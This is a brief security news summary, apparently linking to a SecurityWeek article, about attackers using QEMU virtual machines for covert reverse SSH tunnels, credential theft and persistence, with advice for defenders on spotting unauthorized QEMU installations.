Hackers have begun to abuse QEMU to hide malicious activity.

Threat actors have increasingly abused the QEMU machine emulator to hide malicious activity and deploy ransomware or remote access tools. Sophos observed campaigns since late 2025 in which attackers used QEMU virtual machines to establish covert reverse SSH tunnels, harvest credentials, and maintain persistence. Initial access was gained through vulnerabilities such as exposed SonicWall VPNs, SolarWinds Web Help Desk flaws, and the CitrixBleed2 bug. The activity appears linked to groups like Gold Encounter, and organizations are urged to look for unauthorized QEMU installations and suspicious SSH tunneling.

Read more:

https://www.securityweek.com/hackers-abuse-qemu-for-defense-evasion/